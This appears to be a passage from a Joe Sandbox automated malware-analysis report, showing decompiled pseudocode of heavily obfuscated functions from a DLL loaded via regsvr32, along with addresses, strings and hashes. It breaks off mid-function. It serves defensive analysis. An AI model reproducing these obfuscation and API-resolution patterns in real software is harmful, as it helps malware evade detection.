				_t136 = _t135 + 0x10;
				_t130 = 0;
				_t111 = 0x8f7d8c;
				_t131 = 0x6d;
				_v92 = _v92 / _t131;
				_t132 = 0x63;
				_v92 = _v92 * 0x7e;
				_v92 = _v92 << 4;
				_v92 = _v92 ^ 0x0fcca8f4;
				_v80 = 0x3b92f2;
				_v80 = _v80 >> 5;
				_v80 = _v80 << 7;
				_v80 = _v80 ^ 0x00e0b4f6;
				_v96 = 0xc8d765;
				_v96 = _v96 + 0x5d4a;
				_v96 = _v96 + 0xe222;
				_v96 = _v96 + 0x2a6c;
				_v96 = _v96 ^ 0x00cb3f47;
				_v68 = 0x245f8a;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 ^ 0x0005e36d;
				_v72 = 0x606e32;
				_t38 =  &_v72; // 0x606e32
				_v72 =  *_t38 / _t132;
				_v72 = _v72 ^ 0x000e1dd3;
				_v64 = 0x5a33a9;
				_v64 = _v64 << 4;
				_v64 = _v64 ^ 0x05ab9a18;
				_v84 = 0x1f00cd;
				_v84 = _v84 >> 0xa;
				_v84 = _v84 + 0xffff3621;
				_v84 = _v84 + 0xa555;
				_v84 = _v84 ^ 0xfffb060a;
				_v76 = 0x74e99f;
				_t133 = 0x73;
				_v76 = _v76 / _t133;
				_v76 = _v76 ^ 0x7fd03d3a;
				_v76 = _v76 ^ 0x7fd59ed5;
				_v88 = 0x500daa;
				_v88 = _v88 + 0xffff0ed9;
				_v88 = _v88 << 7;
				_v88 = _v88 + 0xffffc2b5;
				_v88 = _v88 ^ 0x278f56d4;
				while(_t111 != 0x8f7d8c) {
					if(_t111 == 0x6b219a4) {
						__eflags = E1001E831( &_v60, _v64, __eflags, _t129 + 4, _v84, _v76, _v88);
						_t130 =  !=  ? 1 : _t130;
					} else {
						if(_t111 == 0xd391f85) {
							E10004603(_v92, _v80, _t109,  &_v60);
							_t111 = 0xda11c10;
							continue;
						} else {
							if(_t111 != 0xda11c10) {
								L9:
								__eflags = _t111 - 0x44c3f48;
								if(__eflags != 0) {
									continue;
								} else {
								}
							} else {
								_t108 = E10015167(_t129, _v96, _v68,  &_v60, _v72);
								_t136 = _t136 + 0xc;
								if(_t108 != 0) {
									_t111 = 0x6b219a4;
									continue;
								}
							}
						}
					}
					return _t130;
				}
				_t111 = 0xd391f85;
				goto L9;
			}

0x100075a0
0x100075a4
0x100075a6
0x100075a7
0x100075ab
0x100075ac
0x100075ad
0x100075b2
0x100075ba
0x100075c3
0x100075c5
0x100075cc
0x100075d1
0x100075dc
0x100075df
0x100075e3
0x100075e8
0x100075f0
0x100075f8
0x100075fd
0x10007602
0x1000760a
0x10007612
0x1000761a
0x10007622
0x1000762a
0x10007632
0x1000763a
0x1000763f
0x10007647
0x1000764f
0x10007657
0x1000765b
0x10007663
0x1000766b
0x10007670
0x10007678
0x10007680
0x10007685
0x1000768d
0x10007695
0x1000769d
0x100076a9
0x100076b1
0x100076b5
0x100076bd
0x100076c5
0x100076cd
0x100076d5
0x100076da
0x100076e2
0x100076ea
0x100076f4
0x10007777
0x10007779
0x100076f6
0x100076fc
0x10007737
0x1000773e
0x00000000
0x100076fe
0x10007704
0x1000774a
0x1000774a
0x10007750
0x00000000
0x00000000
0x10007752
0x10007706
0x10007719
0x1000771e
0x10007723
0x10007725
0x00000000
0x10007725
0x10007723
0x10007704
0x100076fc
0x10007785
0x10007785
0x10007745
0x00000000

Strings

l*, xrefs: 10007622
2n`, xrefs: 1000764F

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 2n`$l*
API String ID: 0-3370334827
Opcode ID: f8e8c9113c06f5934fa5877b2361bce015d217614e2e3dc636565e9a8b57ac9a
Instruction ID: e6c0a77879ac78d6d1710114299647f21af56602ebeece1a7b8681e5316b8589
Opcode Fuzzy Hash: f8e8c9113c06f5934fa5877b2361bce015d217614e2e3dc636565e9a8b57ac9a
Instruction Fuzzy Hash: FF51977190C3419FE748CE21C88842BBBE5FBC8398F104A1DF59A96265D371CA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 100088E5 Relevance: 2.6, Strings: 2, Instructions: 113
COMMONCrypto

Download Yara Rule

C-Code - Quality: 63%

			E100088E5(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _t128;
				void* _t130;
				intOrPtr* _t131;
				signed int _t134;
				signed int _t135;
				signed int _t136;
				intOrPtr _t151;

				_v56 = _v56 & 0x00000000;
				_v64 = 0x26dc4e;
				_v60 = 0x90956d;
				_v36 = 0xcf35a9;
				_v36 = _v36 << 2;
				_v36 = _v36 ^ 0x4b51ae10;
				_v36 = _v36 ^ 0x486d78b4;
				_v16 = 0x6a8b05;
				_v16 = _v16 + 0xe4cf;
				_v16 = _v16 + 0xffffa8a2;
				_t134 = 0x46;
				_v16 = _v16 * 0x2a;
				_v16 = _v16 ^ 0x119ac6b0;
				_v12 = 0x63718f;
				_v12 = _v12 ^ 0xac303f93;
				_v12 = _v12 | 0x21483dd3;
				_v12 = _v12 ^ 0xc8fe29cb;
				_v12 = _v12 ^ 0x65a9a877;
				_v8 = 0xa7efc1;
				_v8 = _v8 << 8;
				_v8 = _v8 + 0xb1b1;
				_t151 = _a4;
				_v8 = _v8 * 0x78;
				_v8 = _v8 ^ 0xb8be8d60;
				_v28 = 0x8fd9bc;
				_v28 = _v28 | 0x3da90867;
				_v28 = _v28 >> 0x10;
				_v28 = _v28 ^ 0x00084966;
				_v44 = 0xae800e;
				_t135 = 0x12;
				_v44 = _v44 / _t134;
				_v44 = _v44 ^ 0x0008085a;
				_v20 = 0x8967b5;
				_v20 = _v20 * 0x68;
				_t136 = 0x24;
				_v20 = _v20 / _t135;
				_v20 = _v20 | 0xb347368a;
				_v20 = _v20 ^ 0xb353a1a8;
				_v40 = 0x57cc95;
				_v40 = _v40 | 0x5ed91645;
				_v40 = _v40 ^ 0x5ed7b9f4;
				_v32 = 0x5f27cd;
				_v32 = _v32 / _t136;
				_v32 = _v32 << 4;
				_v32 = _v32 ^ 0x00224c0f;
				_v52 = 0xdcde91;
				_v52 = _v52 ^ 0x5e515d5c;
				_v52 = _v52 ^ 0x5e8ee03a;
				_v48 = 0xa1eb7;
				_v48 = _v48 >> 1;
				_v48 = _v48 ^ 0x00095032;
				_v24 = 0xcb21e8;
				_v24 = _v24 >> 0xb;
				_v24 = _v24 + 0xf7fd;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 ^ 0x0006d110;
				_t128 =  *((intOrPtr*)(_t151 + 0x1c))( *((intOrPtr*)(_t151 + 0x24)), 1, 0);
				_t157 = _t128;
				if(_t128 != 0) {
					_push(0x100018f4);
					_push(_v28);
					_push(_v8);
					_t130 = E1001E18B(_v16, _v12, _t157);
					_push(_v32);
					_t153 = _t130;
					_push(_v40);
					_push(_v20);
					_push( *((intOrPtr*)(_t151 + 0x24)));
					_t131 = E100108C0(_t130, _v44);
					if(_t131 != 0) {
						 *_t131();
					}
					E1000B9D7(_v52, _v48, _t153, _v24);
				}
				return _v36;
			}

0x100088eb
0x100088f1
0x100088f8
0x100088ff
0x10008906
0x1000890a
0x10008911
0x10008918
0x1000891f
0x10008926
0x10008934
0x10008937
0x1000893a
0x10008941
0x10008948
0x1000894f
0x10008956
0x1000895d
0x10008964
0x1000896b
0x1000896f
0x1000897a
0x1000897d
0x10008980
0x10008987
0x1000898e
0x10008995
0x10008999
0x100089a0
0x100089ac
0x100089ad
0x100089b2
0x100089b9
0x100089c6
0x100089ce
0x100089cf
0x100089d4
0x100089db
0x100089e2
0x100089e9
0x100089f0
0x100089f7
0x10008a05
0x10008a08
0x10008a0c
0x10008a13
0x10008a1a
0x10008a21
0x10008a28
0x10008a2f
0x10008a32
0x10008a39
0x10008a40
0x10008a44
0x10008a4b
0x10008a4f
0x10008a5b
0x10008a5e
0x10008a60
0x10008a63
0x10008a68
0x10008a6b
0x10008a74
0x10008a79
0x10008a7c
0x10008a7e
0x10008a83
0x10008a89
0x10008a8c
0x10008a96
0x10008a98
0x10008a98
0x10008aa4
0x10008aab
0x10008ab3

Strings

\]Q^, xrefs: 10008A1A
2P, xrefs: 10008A32

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 2P$\]Q^
API String ID: 0-1486727117
Opcode ID: c26a723441a746aba3405045ac7ad20a6158f83bb4ece062976c39e5ad87103c
Instruction ID: 9f5d5d0a983c680f73f5b0fac3b5d6bc43a58b6d898eb1e6eb65aa85d26a0fab
Opcode Fuzzy Hash: c26a723441a746aba3405045ac7ad20a6158f83bb4ece062976c39e5ad87103c
Instruction Fuzzy Hash: FA512F71E0020EEFDF48DFA5C94A9EEBBB1FB48304F20815AE511B6260D7B55A55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001DE11 Relevance: 2.6, Strings: 2, Instructions: 75
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1001DE11(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t63;
				void* _t65;
				signed int _t71;
				signed int _t72;
				void* _t73;
				signed int* _t75;

				_t65 = __ecx;
				_t75 =  &_v28;
				_v24 = 0x2d8453;
				_v24 = _v24 | 0x1034db48;
				_v24 = _v24 + 0x7b8d;
				_v24 = _v24 ^ 0x103e5ae8;
				_v8 = 0xe10b94;
				_v8 = _v8 ^ 0x40dce8cc;
				_v8 = _v8 ^ 0x403d1198;
				_v12 = 0x73298a;
				_v12 = _v12 + 0xffff0521;
				_v12 = _v12 ^ 0x007b1f61;
				_v16 = 0x8f7aa3;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x000695d6;
				_v20 = 0x5f8e34;
				_t71 = 0x4b;
				_v20 = _v20 / _t71;
				_t73 = 0x3df0aa;
				_v20 = _v20 ^ 0xd17456f7;
				_v20 = _v20 ^ 0xd17d363a;
				_v28 = 0xfc314a;
				_v28 = _v28 + 0x67cf;
				_v28 = _v28 ^ 0x6c8c5404;
				_v28 = _v28 >> 0xd;
				_v28 = _v28 ^ 0x0004a72c;
				_v4 = 0xcee202;
				_v4 = _v4 << 7;
				_v4 = _v4 ^ 0x6773743f;
				_t72 = _v4;
				do {
					while(_t73 != 0x3df0aa) {
						if(_t73 == 0xb8603a) {
							_t72 = _t72 + E1000D532(_t65 + 4, _v20, _v28, _v4);
						} else {
							if(_t73 != 0x7335294) {
								goto L6;
							} else {
								_push(_t65);
								_push(_t65);
								_t63 = E10015958();
								_t75 =  &(_t75[2]);
								_t73 = 0xb8603a;
								_t72 = _t72 + _t63;
								continue;
							}
						}
						L9:
						return _t72;
					}
					_t72 = _v24;
					_t73 = 0x7335294;
					L6:
				} while (_t73 != 0x96d6f4b);
				goto L9;
			}

0x1001de11
0x1001de11
0x1001de14
0x1001de1e
0x1001de26
0x1001de2e
0x1001de36
0x1001de3e
0x1001de46
0x1001de4e
0x1001de56
0x1001de5e
0x1001de66
0x1001de6e
0x1001de73
0x1001de7c
0x1001de92
0x1001de9f
0x1001dea3
0x1001dea5
0x1001dead
0x1001deb5
0x1001debd
0x1001dec5
0x1001decd
0x1001ded2
0x1001deda
0x1001dee2
0x1001dee7
0x1001deef
0x1001def3
0x1001def3
0x1001def9
0x1001df42
0x1001defb
0x1001defd
0x00000000
0x1001deff
0x1001df0b
0x1001df0c
0x1001df0d
0x1001df12
0x1001df15
0x1001df17
0x00000000
0x1001df17
0x1001defd
0x1001df44
0x1001df4d
0x1001df4d
0x1001df1b
0x1001df1f
0x1001df21
0x1001df21
0x00000000

Strings

?tsg, xrefs: 1001DEE7
Kom, xrefs: 1001DF21

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ?tsg$Kom
API String ID: 0-1706690104
Opcode ID: 6ea44b82e283c08d7c9a58c52fd55ecc382ce3eb309bf4ce7069bedc55036d7c
Instruction ID: 5a8a88a5f9079c6e1e4847616d97516b823232e8223d30155cebad71945c0f27
Opcode Fuzzy Hash: 6ea44b82e283c08d7c9a58c52fd55ecc382ce3eb309bf4ce7069bedc55036d7c
Instruction Fuzzy Hash: D3319CB65083429BC354EE24C44500FBBE0FBC4768F458E2DF499AB210D3B5DA498B93

Uniqueness

Uniqueness Score: -1.00%

Function 6DA42386 Relevance: 2.0, APIs: 1, Instructions: 452
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E6DA42386(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t156;
				signed int _t158;
				signed int* _t161;
				intOrPtr _t168;
				intOrPtr* _t169;
				signed int _t172;
				signed int _t175;
				signed int* _t179;
				signed int* _t182;
				signed int _t186;
				signed int _t190;
				signed int _t194;
				signed int _t198;
				signed int* _t203;
				signed int _t204;
				signed int _t205;
				intOrPtr* _t206;
				signed int _t207;
				signed int _t222;
				signed int _t226;
				unsigned int _t233;
				void* _t234;

				_t209 = __ecx;
				_push(0x70);
				E6DA5C80D(E6DA6E1D5, __ebx, __edi, __esi);
				_t231 = __ecx;
				 *((intOrPtr*)(_t234 - 0x10)) = 0;
				 *((intOrPtr*)(_t234 - 0x14)) = 0x7fffffff;
				_t198 =  *(_t234 + 8);
				 *(_t234 - 4) = 0;
				if(_t198 != 0x111) {
					__eflags = _t198 - 0x4e;
					if(_t198 != 0x4e) {
						_t233 =  *(_t234 + 0x10);
						__eflags = _t198 - 6;
						if(_t198 == 6) {
							E6DA41D3F(_t209, _t231,  *((intOrPtr*)(_t234 + 0xc)), E6DA405F2(_t198, __ecx, _t233));
						}
						__eflags = _t198 - 0x20;
						if(_t198 != 0x20) {
							L12:
							_t156 =  *(_t231 + 0x4c);
							__eflags = _t156;
							if(_t156 == 0) {
								L20:
								_t158 =  *((intOrPtr*)( *_t231 + 0x28))();
								 *(_t234 + 0x10) = _t158;
								E6DA3F241(_t234 - 0x14, _t233, 7);
								_t203 = 0x6da83db0 + ((_t158 ^  *(_t234 + 8)) & 0x000001ff) * 0xc;
								 *(_t234 - 0x18) = _t203;
								__eflags =  *(_t234 + 8) -  *_t203;
								if( *(_t234 + 8) !=  *_t203) {
									L25:
									_t161 =  *(_t234 - 0x18);
									_t204 =  *(_t234 + 0x10);
									 *_t161 =  *(_t234 + 8);
									_t161[2] = _t204;
									while(1) {
										__eflags =  *_t204;
										if( *_t204 == 0) {
											break;
										}
										__eflags =  *(_t234 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t234 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t234 + 0x10) + 4)));
											while(1) {
												_t205 = E6DA3E884();
												__eflags = _t205;
												if(_t205 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) -  *(_t234 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) ==  *(_t234 + 8)) {
													( *(_t234 - 0x18))[1] = _t205;
													E6DA3F275(_t234 - 0x14);
													L113:
													_t206 =  *((intOrPtr*)(_t205 + 0x14));
													L114:
													_push(_t233);
													L115:
													_push( *((intOrPtr*)(_t234 + 0xc)));
													L116:
													_t168 =  *_t206();
													L117:
													 *((intOrPtr*)(_t234 - 0x10)) = _t168;
													goto L118;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t207 = _t205 + 0x18;
												__eflags = _t207;
												_push(_t207);
											}
											_t204 =  *(_t234 + 0x10);
											L36:
											_t204 =  *_t204();
											 *(_t234 + 0x10) = _t204;
											continue;
										}
										_push( *(_t234 + 8));
										_push( *((intOrPtr*)(_t204 + 4)));
										_t175 = E6DA3E884();
										 *(_t234 + 0x10) = _t175;
										__eflags = _t175;
										if(_t175 == 0) {
											goto L36;
										}
										( *(_t234 - 0x18))[1] = _t175;
										E6DA3F275(_t234 - 0x14);
										L29:
										_t222 =  *((intOrPtr*)( *(_t234 + 0x10) + 0x10)) - 1;
										__eflags = _t222 - 0x53;
										if(__eflags > 0) {
											goto L118;
										}
										switch( *((intOrPtr*)(_t222 * 4 +  &M6DA4294A))) {
											case 0:
												_push(E6DA4542F(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc)));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E6DA405F2(__ebx, __ecx,  *(__ebp + 0xc));
												goto L50;
											case 3:
												_push(__esi);
												__eax = E6DA405F2(__ebx, __ecx,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 5:
												__ecx = __ebp - 0x28;
												E6DA44FFE(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E6DA3F2AA(__ecx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E6DA4061E(__ebx, __ecx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eax == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eax != 0) {
														__ecx = __eax + 0x24;
														__eax = E6DA4A67E(__eax + 0x24,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eax != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												_t84 = __ebp - 0x5c;
												 *_t84 =  *(__ebp - 0x5c) & 0x00000000;
												__eflags =  *_t84;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E6DA40DD1(__ebx, __ebp - 0x7c, __edi, __esi,  *_t84);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E6DA44FFE(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = E6DA454AC(__ecx);
												goto L118;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E6DA405F2(__ebx, __ecx, __esi);
												goto L62;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L114;
											case 0xa:
												_push(E6DA49980(__ebx, __ecx, __edi, __esi, __eflags, __esi));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L62:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L50:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 0xb:
												_push(__esi);
												goto L110;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L66;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0xe:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L69;
											case 0xf:
												_push(__esi >> 0x10);
												__eax = __si;
												goto L69;
											case 0x10:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												goto L72;
											case 0x11:
												__eax = E6DA405F2(__ebx, __ecx, __esi);
												goto L48;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 0x13:
												_push(E6DA405F2(__ebx, __ecx,  *(__ebp + 0xc)));
												_push(E6DA405F2(__ebx, __ecx, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												_t112 =  *((intOrPtr*)(__edi + 0x20)) == __esi;
												__eflags = _t112;
												__eax = 0 | _t112;
												goto L75;
											case 0x14:
												__eax = E6DA4542F(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L77;
											case 0x15:
												__eax = E6DA49980(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L77;
											case 0x16:
												__esi = __esi >> 0x10;
												_push(__esi >> 0x10);
												__eax = __si;
												_push(__si);
												__eax = E6DA49980(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L75;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L81;
											case 0x18:
												_push(__esi);
												L81:
												__eax = E6DA405F2(__ebx, __ecx);
												L77:
												_push(__eax);
												goto L66;
											case 0x19:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												goto L84;
											case 0x1a:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__ecx);
												L84:
												_push(__eax);
												__eax = E6DA405F2(__ebx, __ecx,  *(__ebp + 0xc));
												goto L75;
											case 0x1b:
												_push(__esi);
												__eax = E6DA405F2(__ebx, __ecx,  *(__ebp + 0xc));
												goto L69;
											case 0x1c:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E6DA405F2(__ebx, __ecx, __esi);
												goto L88;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												__eflags = __eax - 0x2a;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													goto L111;
												}
												_push(E6DA405F2(__ebx, __ecx, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L73;
											case 0x1e:
												_push(__esi);
												L66:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L116;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L88:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L75:
												_push(__eax);
												goto L73;
											case 0x22:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												L72:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L73:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t194;
												if(_t194 != 0) {
													goto L118;
												}
												goto L39;
											case 0x24:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x25:
												goto L118;
											case 0x26:
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													goto L118;
												}
												L39:
												 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
												E6DA3F275(_t234 - 0x14);
												_t172 = 0;
												__eflags = 0;
												goto L40;
											case 0x27:
												__eax = E6DA49980(__ebx, __ecx, __edi, __esi, __eflags, __esi);
												L48:
												_push(__eax);
												L110:
												_push( *(__ebp + 0xc));
												goto L111;
											case 0x28:
												_push(E6DA49980(__ebx, __ecx, __edi, __esi, __eflags, __esi));
												goto L115;
											case 0x29:
												_push(__esi);
												__eax = E6DA49980(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L69;
											case 0x2a:
												__ecx = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = __esi;
												__eax = __esi >> 0x10;
												__ecx = __eax;
												__ecx = __eax & 0x0000f000;
												_push(__ecx);
												__eax = __eax & 0x00000fff;
												__eflags = __eax;
												_push(__eax);
												__eax = E6DA405F2(__ebx, __ecx,  *(__ebp + 0xc));
												goto L104;
											case 0x2b:
												__eax =  *(__ebp + 0xc) & 0x000000ff;
												_push(__esi);
												L69:
												_push(__eax);
												L111:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x2c:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L104:
												_push(__eax);
												goto L105;
											case 0x2d:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												_push( *(__ebp + 0xc));
												L105:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
										}
									}
									_t179 =  *(_t234 - 0x18);
									_t58 =  &(_t179[1]);
									 *_t58 = _t179[1] & 0x00000000;
									__eflags =  *_t58;
									E6DA3F275(_t234 - 0x14);
									goto L39;
								}
								_t182 = _t203;
								__eflags =  *(_t234 + 0x10) - _t182[2];
								if( *(_t234 + 0x10) != _t182[2]) {
									goto L25;
								}
								_t205 = _t182[1];
								 *(_t234 + 0x10) = _t205;
								E6DA3F275(_t234 - 0x14);
								__eflags = _t205;
								if(_t205 == 0) {
									goto L39;
								}
								__eflags =  *(_t234 + 8) - 0xc000;
								if( *(_t234 + 8) < 0xc000) {
									goto L29;
								}
								goto L113;
							}
							__eflags =  *(_t156 + 0x74);
							if( *(_t156 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t198 - 0x200;
							if(_t198 < 0x200) {
								L16:
								__eflags = _t198 - 0x100;
								if(_t198 < 0x100) {
									L18:
									__eflags = _t198 - 0x281 - 0x10;
									if(_t198 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t186 =  *((intOrPtr*)( *( *(_t231 + 0x4c)) + 0x94))(_t198,  *((intOrPtr*)(_t234 + 0xc)), _t233, _t234 - 0x10);
									__eflags = _t186;
									if(_t186 != 0) {
										goto L118;
									}
									goto L20;
								}
								__eflags = _t198 - 0x10f;
								if(_t198 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t198 - 0x209;
							if(_t198 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t190 = E6DA41DB7(_t198, _t231, _t231, _t233, _t233 >> 0x10);
							__eflags = _t190;
							if(_t190 != 0) {
								L2:
								 *((intOrPtr*)(_t234 - 0x10)) = 1;
								L118:
								_t169 =  *((intOrPtr*)(_t234 + 0x14));
								if(_t169 != 0) {
